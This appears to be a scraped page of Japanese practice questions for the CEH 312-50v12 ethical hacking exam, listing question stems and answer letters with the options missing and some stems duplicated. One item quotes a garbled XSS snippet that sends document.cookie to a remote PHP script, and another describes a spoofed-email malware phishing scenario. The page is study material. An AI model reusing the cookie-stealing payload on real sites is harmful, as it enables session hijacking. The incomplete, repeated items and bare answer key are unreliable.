ECCouncil Certified Ethical Hacker Exam (312-50v12日本語版) - 312-50v12日本語 Exam Practice Test
抽出した LM ハッシュに 8 文字未満のパスワードが含まれているかどうかをどのように判断できますか?
Correct Answer: A
ゾーン転送に関する次の記述のうち正しいものはどれですか? (3 つ選択してください。)
Correct Answer: A,C,E
リスク評価方法論の次のステップのうち、脆弱性の特定に関係するものはどれですか?
Correct Answer: D
CompanyXYZ から、境界電子メール ゲートウェイのセキュリティを評価するよう依頼されました。ニューヨークのオフィスから、特別な形式の電子メール メッセージを作成し、インターネット経由で CompanyXYZ の従業員に送信します。CompanyXYZ の従業員は、テストについて知っています。電子メール メッセージは次のようになります。
送信者: [email protected]
宛先: [email protected] 件名: テストメッセージ
日付: 2017/4/3 14:37
CompanyXYZ の従業員があなたの電子メール メッセージを受け取ります。
これは、CompanyXYZ の電子メール ゲートウェイが何を防止できないことを証明していますか?
送信者: [email protected]
宛先: [email protected] 件名: テストメッセージ
日付: 2017/4/3 14:37
CompanyXYZ の従業員があなたの電子メール メッセージを受け取ります。
これは、CompanyXYZ の電子メール ゲートウェイが何を防止できないことを証明していますか?
Correct Answer: D
Explanation: Only visible for TrainingDump members. You can sign-up / login (it's free).
ある日、ジュディはフォーラムを作成しました。彼女は、あるユーザーがコメントを書かずに奇妙な画像を投稿していることを発見しました。
彼女はすぐにセキュリティの専門家に電話し、その画像の背後に次のコードが隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />);
</スクリプト>
画像をクリックしたユーザーにはどのような問題が発生しましたか?
彼女はすぐにセキュリティの専門家に電話し、その画像の背後に次のコードが隠されていることを発見しました。
<スクリプト>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />);
</スクリプト>
画像をクリックしたユーザーにはどのような問題が発生しましたか?
Correct Answer: B
Explanation: Only visible for TrainingDump members. You can sign-up / login (it's free).
侵入テストを実行するように指示されました。情報収集中に、Google で従業員リストを見つけました。受付係のメール アドレスを見つけたので、元のメール アドレスを彼女の上司のメール アドレス (boss@company) に変更してメールを送信しました。このメールでは、情報が記載された PDF を要求しました。彼女はあなたのメールを読み、リンクが記載された PDF を返信しました。あなたは PDF リンクを悪意のあるリンク (これらのリンクにはマルウェアが含まれています) と交換し、リンクが機能しないという変更された PDF を返信しました。彼女はあなたのメールを読み、リンクを開くと、彼女のマシンが感染しました。これで、会社のネットワークにアクセスできるようになりました。どのようなテスト方法を使用しましたか?
Correct Answer: C
Explanation: Only visible for TrainingDump members. You can sign-up / login (it's free).
SafePath Corp のサイバーセキュリティ コンサルタントとして、安全な電子メール通信システムの実装を任されています。重要な要件は、機密性と否認防止性の両方を保証することです。さまざまな暗号化方法を検討した結果、対称暗号化と非対称暗号化を組み合わせて使用することを検討しています。ただし、どの暗号化手法が目的に最も適しているかはわかりません。これらの要件を満たすには、次のオプションのどれを選択しますか。
Correct Answer: B
Explanation: Only visible for TrainingDump members. You can sign-up / login (it's free).
CyberTech Inc. は最近、公式 Web サイトで SQL インジェクション攻撃を受けました。同社は、このような攻撃に対する防御戦略を構築して組み込むために、セキュリティ専門家の Bob を任命しました。Bob は、安全なアクセスが承認されたデータの種類、範囲、サイズ、値などのエンティティのリストのみを受け入れるという方法を採用しました。上記のシナリオで Bob が採用した防御手法は何ですか。
Correct Answer: A
Explanation: Only visible for TrainingDump members. You can sign-up / login (it's free).
Web サービスを提供する Web サイトや Web ポータルでは、通常、Simple Object Access Protocol (SOAP) が使用されます。
次のどれがプロトコルの定義または特性として誤っていますか?
次のどれがプロトコルの定義または特性として誤っていますか?
Correct Answer: D